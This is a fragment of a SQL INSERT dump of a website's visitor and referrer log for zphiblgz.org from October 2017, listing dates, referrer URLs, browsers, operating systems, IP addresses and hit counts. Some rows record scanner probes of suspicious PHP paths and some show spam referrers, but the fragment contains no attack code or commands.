7.148.42','000',1,0),(12332,'2017-10-07','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',1,0),(12333,'2017-10-07','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(12334,'2017-10-07','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(12335,'2017-10-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','145.239.89.21','000',1,0),(12336,'2017-10-07','http://zphiblgz.org','MSIE','Windows','6.0','','173.208.198.50','000',5,0),(12337,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.207.243','000',2,0),(12338,'2017-10-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.78','000',1,0),(12339,'2017-10-07','http://zphiblgz.org/','Chrome','Windows','59.0.3071.115','','185.71.3.241','000',1,0),(12340,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.138.253.244','000',1,0),(12341,'2017-10-07','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','145.239.89.22','000',1,0),(12342,'2017-10-07','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','139.99.112.108','000',2,0),(12343,'2017-10-07','http://zphiblgz.org','Firefox','Windows','40.1','','87.172.186.15','000',2,0),(12344,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',1,0),(12345,'2017-10-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(12346,'2017-10-07','http://www.zahvat.ru/','Opera','Windows','9.00','','37.115.191.27','000',3,0),(12347,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.79.107','000',1,0),(12348,'2017-10-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',34,0),(12349,'2017-10-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',13,0),(12350,'2017-10-07','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1567.D0JMEktYeHp86p5gkNmjYuPye8CD63la32ZSzQTQjWc6i9p6Dp0fbsUJP6Jb72Zo.1c2c4d09e40978e7249a8c9f8144d8438a1901de&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWS2pCR2Y4aWNiQ0NDVnNyd1hWNW0yYmh5MWVhYXR6d0lLMnRDaU9ZTXhSdXUwM1FVR1RrN1FI&b64e=2&sign=db6e99bf90341d090c52fe84a8bddc7b&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FwnIB5-3_5i7x82lyFwB3BkprDG2Wm5Qa1xAy_yG4ygyGGXfLX3pcdQdFN08AbhPbwlCrNSQe1Lzm2ldzp631fKIMy-XI8eQxgA521Y3jpZ-2Fdm7-wcHnW2SnQxRHCoE&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX9U1h5sqoIO-TeZ_ylS-iAsZ19UxFnV06zUV-HljO8S_qhCfiv7jlyYbYZ4fioAVSDyBuSr-kxbA&l10n=ru&cts=1507401312891&mc=3.9141108835','MSIE','Windows','8.0','','79.111.99.127','000',1,0),(12351,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','142.44.166.241','000',1,0),(12352,'2017-10-07','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.167.245.76','000',1,0),(12353,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(12354,'2017-10-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','94.177.123.116','000',1,0),(12355,'2017-10-07','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.166','000',1,0),(12356,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.13','000',1,0),(12357,'2017-10-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.11.167.4','000',1,0),(12358,'2017-10-07','http://pk-services.ru/','Opera','Windows','9.0','','188.163.74.19','000',3,0),(12359,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.46','000',1,0),(12360,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.0.149','000',1,0),(12361,'2017-10-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.223.79','000',1,0),(12362,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(12363,'2017-10-07','http://zphiblgz.org/','MSIE','Unknown','2.1','','114.40.192.37','000',1,0),(12364,'2017-10-07','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.142','000',1,0),(12365,'2017-10-07','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','64.120.30.133','000',1,0),(12366,'2017-10-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','101.200.173.34','000',12,0),(12367,'2017-10-07','http://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.168','000',1,0),(12368,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.180.157','000',1,0),(12369,'2017-10-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(12370,'2017-10-07','https://www.google.com/','Safari','iPhone','11.0','','100.36.93.253','000',6,0),(12371,'2017-10-08','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',55,0),(12372,'2017-10-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.75','000',2,0),(12373,'2017-10-08','http://zphiblgz.org','Chrome','Linux','12.0.742.100','','142.4.215.116','000',2,0),(12374,'2017-10-08','http://optom-deshevo.ru/','MSIE','Windows','6.0','','46.118.159.224','000',5,0),(12375,'2017-10-08','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','37.9.169.13','000',41,0),(12376,'2017-10-08','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.140','000',1,0),(12377,'2017-10-08','https://mansparskats.com/','MSIE','Windows','6.0','','188.163.74.19','000',2,0),(12378,'2017-10-08','http://zphiblgz.org/wp-updats.php','Chrome','Windows','5.0.375.99','','176.31.248.150','000',1,0),(12379,'2017-10-08','http://zphiblgz.org','Firefox','Windows','40.1','','2.81.21.161','000',2,0),(12380,'2017-10-08','https://pl.id-forex.com/','MSIE','Windows','6.0','','37.115.189.113','000',6,0),(12381,'2017-10-08','http://zphiblgz.org/','Edge','Windows','15.15063','','163.172.4.153','000',1,0),(12382,'2017-10-08','http://14b.info/','Unknown','Unknown','Unknown','','37.115.189.113','000',1,0),(12383,'2017-10-08','https://mojpreskumanie.com/','Unknown','Unknown','Unknown','','188.163.74.19','000',1,0),(12384,'2017-10-08','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','163.172.255.139','000',1,0),(12385,'2017-10-08','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.153','000',1,0),(12386,'2017-10-08','http://zphiblgz.org/history/','Safari','iPhone','11.0','','100.36.93.253','000',1,0),(12387,'2017-10-08','http://search.smt.docomo.ne.jp/result?search_box=%E3%83%A8%E3%83%BC%E3%83%AD%E3%83%94%E3%82%A2%E3%83%B3%E3%82%AF%E3%83%A9%E3%83%83%E3%82%B7%E3%83%83%E3%82%AF%E3%81%93%E3%81%9F%E3%81%A4&MT=%E3%83%A8%E3%83%BC%E3%83%AD%E3%83%94%E3%82%A2%E3%83%B3%E3%82%AF%E3%83%A9%E3%83%83%E3%82%B7%E3%83%83%E3%82%AF%E3%81%93%E3%81%9F%E3%81%A4&SID=s04&URANK=1&SPAGE=2&TPLID=01&UNIT=02&IND=000&PAGE=1','Android Browser','Android','4.0','','49.96.12.33','000',1,0),(12388,'2017-10-08','http://proxyelite.biz/','MSIE','Windows','5.5','','37.115.191.27','000',2,0),(12389,'2017-10-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(12390,'2017-10-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(12391,'2017-10-08','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','173.69.157.50','000',3,0),(12392,'2017-10-08','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.199','000',1,0),(12393,'2017-10-08','http://artel116.ru/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(12394,'2017-10-08','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.80','000',1,0),(12395,'2017-10-08','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',4,0),(12396,'2017-10-08','zphiblgz.org','Chrome','Windows','50.0.2661.75','','69.163.185.19','000',7,0),(12397,'2017-10-08','zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.135.143.224','000',7,0),(12398,'2017-10-08','https://colobit.biz/?ref=kissska','Unknown','Unknown','Unknown','','46.118.159.224','000',1,0),(12399,'2017-10-08','https://univerfiles.com/','MSIE','Windows','5.0','','46.118.159.224','000',2,0),(12400,'2017-10-08','http://zphiblgz.org/','Edge','Windows','15.15063','','79.62.100.2','000',3,0),(12401,'2017-10-08','http://zphiblgz.org','Chrome','Macintosh','59.0.3071.109','','192.198.80.227','000',1,0),(12402,'2017-10-08','http://zphiblgz.org','Safari','Macintosh','10.0.3','','138.197.111.69','000',2,0),(12403,'2017-10-08','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(12404,'2017-10-08','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','159.203.169.43','000',4,0),(12405,'2017-10-08','http://zphiblgz.org','Firefox','Windows','54.0','','159.203.169.43','000',5,0),(12406,'2017-10-08','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','159.203.169.43','000',1,0),(12407,'2017-10-08','http://zphiblgz.org','Chrome','Windows','49.0.2623.75','','159.203.169.43','000',1,0),(12408,'2017-10-08','http://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','159.203.169.43','000',1,0),(12409,'2017-10-08','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','159.203.169.43','000',2,0),(12410,'2017-10-08','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','159.203.169.43','000',1,0),(12411,'2017-10-08','http://zphiblgz.org','Firefox','Linux','49.0','','159.203.169.43','000',1,0),(12412,'2017-10-08','http://zphiblgz.org','Chrome','Windows','10.0.649.0','','37.59.55.128','000',47,0),(12413,'2017-10-08','https://www.google.com/','Firefox','Macintosh','56.0','','208.58.215.244','000',1,0),(12414,'2017-10-08','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','73.201.199.79','000',3,0),(12415,'2017-10-08','http://zphiblgz.org','Firefox','Windows','40.1','','168.167.94.151','000',2,0),(12416,'2017-10-09','http://zphiblgz.org','Safari','iPhone','6.0','','106.38.241.156','000',1,0),(12417,'2017-10-09','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',71,0),(12418,'2017-10-09','http://doxyporno.com/','MSIE','Windows','6.0','','37.115.191.27','000',4,0),(12419,'2017-10-09','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',3,0),(12420,'2017-10-09','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.102.3','000',1,0),(12421,'2017-10-09','http://zphiblgz.org','Firefox','Linux','54.0','','192.198.80.227','000',2,0),(12422,'2017-10-09','http://komp-pomosch.ru/','MSIE','Windows','6.0','','188.163.74.19','000',3,0),(12423,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','13.79.231.167','000',1,0),(12424,'2017-10-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.62.146','000',1,0),(12425,'2017-10-09','zphiblgz.org','Chrome','Windows','50.0.2661.75','','62.77.94.15','000',1,0),(12426,'2017-10-09','zphiblgz.org','Chrome','Windows','50.0.2661.75','','121.78.145.18','000',1,0),(12427,'2017-10-09','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(12428,'2017-10-09','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',5,0),(12429,'2017-10-09','zphiblgz.org','Chrome','Windows','50.0.2661.75','','149.202.70.53','000',1,0),(12430,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',1,0),(12431,'2017-10-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.57.177','000',1,0),(12432,'2017-10-09','http://zphiblgz.org','Safari','iPhone','9.0','','150.255.85.112','000',1,0),(12433,'2017-10-09','http://zphiblgz.org','Safari','iPhone','9.0','','124.235.138.204','000',1,0),(12434,'2017-10-09','http://zphiblgz.org/wp-admin/post-new.php?post_type=event','Chrome','Windows','61.0.3163.100','','198.51.197.174','000',2,0),(12435,'2017-10-09','http://xdoza.com/','MSIE','Windows','7.0b','','37.115.189.113','000',2,0),(12436,'2017-10-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','13.57.10.111','000',1,0),(12437,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.1.129','000',1,0),(12438,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.239.90.19','000',1,0),(12439,'2017-10-09','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','69.195.247.116','000',2,0),(12440,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.171.49','000',1,0),(12441,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(12442,'2017-10-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(12443,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.246.163.141','000',1,0),(12444,'2017-10-09','http://dverimegapolis.ru/','MSIE','Unknown','7.0b','','37.115.191.27','000',1,0),(12445,'2017-10-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(12446,'2017-10-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(12447,'2017-10-09','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.102.23','000',1,0),(12448,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','50.116.1.172','000',1,0),(12449,'2017-10-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.139.161','000',1,0),(12450,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.43.232','000',2,0),(12451,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.202','000',1,0),(12452,'2017-10-09','http://zphiblgz.org','Firefox','Windows','40.1','','186.133.68.5','000',2,0),(12453,'2017-10-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.59','000',1,0),(12454,'2017-10-09','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.0.130','000',1,0),(12455,'2017-10-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.43','000',1,0),(12456,'2017-10-09','http://zphiblgz.org/','Firefox','Windows','53.0','','109.108.44.20','000',3,0),(12457,'2017-10-09','http://zphiblgz.org','Firefox','Windows','51.0','','94.229.71.78','000',1,0),(12458,'2017-10-09','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','61.0.3163.100','','100.15.160.57','000',4,0),(12459,'2017-10-09','http://zphiblgz.org','Chrome','Macintosh','43.0.2357.134','','218.92.147.30','000',1,0),(12460,'2017-10-09','zphiblgz.org','Chrome','Windows','50.0.2661.75','','95.105.171.133','000',8,0),(12461,'2017-10-09','http://multgo.ru/','MSIE','Windows','6.0','','46.118.159.224','000',5,0),(12462,'2017-10-09','http://zphiblgz.org','Firefox','Windows','41.0','','34.203.221.232','000',1,0),(12463,'2017-10-09','http://zphiblgz.org','Firefox','Windows','41.0','','173.208.196.186','000',147,0),(12464,'2017-10-09','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',2,0),(12465,'2017-10-09','https://mojaocena.com/','MSIE','Windows','5.0','','188.163.74.19','000',1,0),(12466,'2017-10-10','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',44,0),(12467,'2017-10-10','http://zphiblgz.org','Firefox','Windows','40.1','','177.192.248.34','000',2,0),(12468,'2017-10-10','http://zphiblgz.org','Firefox','Windows','40.1','','85.154.12.55','000',2,0),(12469,'2017-10-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.58','000',1,0),(12470,'2017-10-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(12471,'2017-10-10','http://zphiblgz.org','Chrome','Linux','59.0.3071.104','','192.198.80.227','000',1,0),(12472,'2017-10-10','https://moetomnenie.com/','Unknown','Unknown','Unknown','','188.163.74.19','000',1,0),(12473,'2017-10-10','https://kandidos.com/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(12474,'2017-10-10','http://zphiblgz.org/baws.php','Chrome','Windows','5.0.375.99','','75.98.174.194','000',2,0),(12475,'2017-10-10','zphiblgz.org','Chrome','Windows','50.0.2661.75','','133.242.22.177','000',2,0),(12476,'2017-10-10','http://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/','Unknown','Unknown','Unknown','','37.115.191.27','000',3,0),(12477,'2017-10-10','http://zphiblgz.org','Firefox','Windows','40.1','','119.93.59.23','000',2,0),(12478,'2017-10-10','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',1,0),(12479,'2017-10-10','http://zphiblgz.org/tplpage.php','Chrome','Windows','5.0.375.99','','72.52.196.125','000',1,0),(12480,'2017-10-10','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.201','000',1,0),(12481,'2017-10-10','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.158','000',1,0),(12482,'2017-10-10','http://zphiblgz.org','Firefox','Windows','40.1','','124.168.120.151','000',2,0),(12483,'2017-10-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(12484,'2017-10-10','http://zphiblgz.org/wp-blog-mail.php','Chrome','Windows','5.0.375.99','','74.220.215.203','000',2,0),(12485,'2017-10-10','http://zphiblgz.org','MSIE','Windows','11.0','','159.142.31.92','000',1,0),(12486,'2017-10-10','http://zphiblgz.org','MSIE','Windows','11.0','','66.102.8.32','000',2,0),(12487,'2017-10-10','http://zphiblgz.org','MSIE','Windows','11.0','','66.102.8.38','000',1,0),(12488,'2017-10-10','http://pk-pomosch.ru/','MSIE','Windows','6.0','','46.118.159.224','000',1,0),(12489,'2017-10-10','https://www.google.com/','Firefox','Macintosh','55.0','','107.1.245.90','000',1,0),(12490,'2017-10-10','http://besthoro.ru/','MSIE','Windows','5.5','','37.115.189.113','000',2,0),(12491,'2017-10-10','http://www.zahvat.ru/','MSIE','Windows','2.0d','','188.163.74.19','000',2,0),(12492,'2017-10-10','http://zphiblgz.org','Edge','Windows','12.10240','','160.16.113.247','000',1,0),(12493,'2017-10-10','http://zphiblgz.org/','MSIE','Windows','9.0','','146.185.223.221','000',2,0),(12494,'2017-10-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(12495,'2017-10-10','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(12496,'2017-10-10','http://rockprogblog.com/','Opera','Windows','7.60','','37.115.189.113','000',2,0),(12497,'2017-10-10','http://zphiblgz.org','Chrome','Linux','38.0.2127.18','','107.173.184.190','000',2,0),(12498,'2017-10-10','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.212','000',1,0),(12499,'2017-10-10','https://www.google.com/','Chrome','Windows','61.0.3163.100','','173.59.238.252','000',5,0),(12500,'2017-10-10','http://zphiblgz.org','Safari','iPhone','9.0','','221.13.12.124','000',1,0),(12501,'2017-10-10','http://zphiblgz.org','Safari','iPhone','9.0','','122.96.29.128','000',1,0),(12502,'2017-10-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.76','000',1,0),(12503,'2017-10-10','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.65','000',1,0),(12504,'2017-10-10','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.23','000',1,0),(12505,'2017-10-10','http://zphiblgz.org','Safari','iPhone','10.0','','71.121.204.212','000',1,0),(12506,'2017-10-10','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(12507,'2017-10-10','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(12508,'2017-10-11','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',68,0),(12509,'2017-10-11','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.219','000',1,0),(12510,'2017-10-11','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.124','000',2,0),(12511,'2017-10-11','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.176','000',2,0),(12512,'2017-10-11','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.17','000',2,0),(12513,'2017-10-11','http://zphiblgz.org','python-requests','Unknown','2.18.3','','36.248.97.139','000',1,0),(12514,'2017-10-11','http://zphiblgz.org','Chrome','Macintosh','36.0.1985.125','','36.248.97.139','000',1,0),(12515,'2017-10-11','http://zphiblgz.org','Firefox','Macintosh','30.0','','36.248.97.139','000',1,0),(12516,'2017-10-11','http://zphiblgz.org','Firefox','Windows','41.0','','36.248.97.139','000',9,0),(12517,'2017-10-11','http://zphiblgz.org','Safari','iPhone','7.0','','36.248.97.139','000',1,0),(12518,'2017-10-11','http://zphiblgz.org','Firefox','Windows','30.0','','36.248.97.139','000',1,0),(12519,'2017-10-11','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.190','000',1,0),(12520,'2017-10-11','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',3,0),(12521,'2017-10-11','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.49','000',2,0),(12522,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.162.106','000',1,0),(12523,'2017-10-11','https://buyclomidonlaine.com/','MSIE','Windows','6.0','','37.115.189.113','000',2,0),(12524,'2017-10-11','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','52.89.221.225','000',1,0),(12525,'2017-10-11','http://zphiblgz.org','Firefox','Windows','52.0','','66.102.8.35','000',2,0),(12526,'2017-10-11','https://www.google.com/','Firefox','Windows','52.0','','8.44.100.11','000',4,0),(12527,'2017-10-11','http://zphiblgz.org/bskantsuri/','MSIE','Windows','10.0','','51.15.57.177','000',1,0),(12528,'2017-10-11','http://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(12529,'2017-10-11','http://zphiblgz.org','MSIE','Windows','6.0','','45.55.224.77','000',1,0),(12530,'2017-10-11','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',2,0),(12531,'2017-10-11','zphiblgz.org','Firefox','Macintosh','16.0','','187.5.6.136','000',1,0),(12532,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',1,0),(12533,'2017-10-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','158.255.6.242','000',1,0),(12534,'2017-10-11','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.124','000',1,0),(12535,'2017-10-11','https://ww2awards.info/','MSIE','Windows','6.0','','37.115.191.27','000',3,0),(12536,'2017-10-11','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','69.195.247.116','000',2,0),(12537,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.163.85','000',2,0),(12538,'2017-10-11','http://zphiblgz.org/','Chrome','Windows','59.0.3071.115','','79.110.31.187','000',1,0),(12539,'2017-10-11','https://www.google.com/','Chrome','Windows','61.0.3163.100','','167.219.88.140','000',1,0),(12540,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(12541,'2017-10-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','137.74.73.179','000',1,0),(12542,'2017-10-11','http://www.zphiblgz.org/modules/filesupload/upload.php','Chrome','Windows','42.0.2311.152','','209.90.225.219','000',1,0),(12543,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.117','000',1,0),(12544,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.30','000',1,0),(12545,'2017-10-11','http://zphiblgz.org','Firefox','Windows','40.1','','117.192.207.117','000',2,0),(12546,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.146.121.3','000',2,0),(12547,'2017-10-11','http://zphiblgz.org/wp-content/plugins/easyrotator-for-wordpress/marvins.php','Chrome','Windows','5.0.375.99','','72.52.196.125','000',2,0),(12548,'2017-10-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(12549,'2017-10-11','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(12550,'2017-10-11','http://optom-deshevo.ru/','Opera','Windows','6.0','','46.118.159.224','000',1,0),(12551,'2017-10-11','http://komputers-best.ru/','MSIE','Windows','5.0','','37.115.191.27','000',3,0),(12552,'2017-10-11','http://pro-tec.kz/','MSIE','Unknown','6.0','','37.115.191.27','000',1,0),(12553,'2017-10-11','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.35','000',1,0),(12554,'2017-10-11','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.111.141','000',2,0),(12555,'2017-10-11','http://kemerovo.zrus.org/','MSIE','Windows','5.5','','46.118.159.224','000',1,0),(12556,'2017-10-11','http://zphiblgz.org','Firefox','Linux','54.0','','159.203.164.194','000',3,0),(12557,'2017-10-11','http://zphiblgz.org','Firefox','Windows','54.0','','159.203.164.194','000',3,0),(12558,'2017-10-11','http://zphiblgz.org','Firefox','Linux','49.0','','159.203.164.194','000',1,0),(12559,'2017-10-11','http://zphiblgz.org','MSIE','Windows','10.0','','159.203.164.194','000',3,0),(12560,'2017-10-11','http://zphiblgz.org','Chrome','Linux','59.0.3071.115','','159.203.164.194','000',1,0),(12561,'2017-10-11','http://zphiblgz.org','Chrome','Windows','49.0.2623.75','','159.203.164.194','000',2,0),(12562,'2017-10-11','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','159.203.164.194','000',1,0),(12563,'2017-10-11','http://zphiblgz.org','Safari','Macintosh','10.0.3','','159.203.164.194','000',1,0),(12564,'2017-10-11','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','159.203.164.194','000',1,0),(12565,'2017-10-11','http://zphiblgz.org/lsn_an.php','Chrome','Windows','5.0.375.99','','50.87.248.165','000',2,0),(12566,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(12567,'2017-10-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.151.250','000',1,0),(12568,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.82','000',1,0),(12569,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.192.0.58','000',2,0),(12570,'2017-10-11','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.153','000',1,0),(12571,'2017-10-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.214.104.146','000',1,0),(12572,'2017-10-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.87.154.255','000',1,0),(12573,'2017-10-12','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',108,0),(12574,'2017-10-12','http://www.google.com/','Chrome','Android','61.0.3163.98','','100.36.62.218','000',32,0),(12575,'2017-10-12','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(12576,'2017-10-12','http://zphiblgz.org/','MSIE','Windows','11.0','','196.52.84.19','000',1,0),(12577,'2017-10-12','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(12578,'2017-10-12','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','18.194.165.206','000',1,0),(12579,'2017-10-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.16','000',2,0),(12580,'2017-10-12','http://zphiblgz.org','Chrome','Android','30.0.1599.82','','183.36.114.99','000',2,0),(12581,'2017-10-12','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.22','000',2,0),(12582,'2017-10-12','http://14b.info/','MSIE','Windows','5.0','','37.115.189.113','000',2,0),(12583,'2017-10-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(12584,'2017-10-12','http://zphiblgz.org','Firefox','Windows','56.0','','124.93.222.26','000',2,0),(12585,'2017-10-12','http://zphiblgz.org/modules/filesupload/upload.php','Chrome','Windows','42.0.2311.152','','209.90.225.219','000',1,0),(12586,'2017-10-12','http://zphiblgz.org','Firefox','Windows','36.0','','82.80.249.211','000',2,0),(12587,'2017-10-12','http://zphiblgz.org','MSIE','Windows','11.0','','82.80.249.192','000',6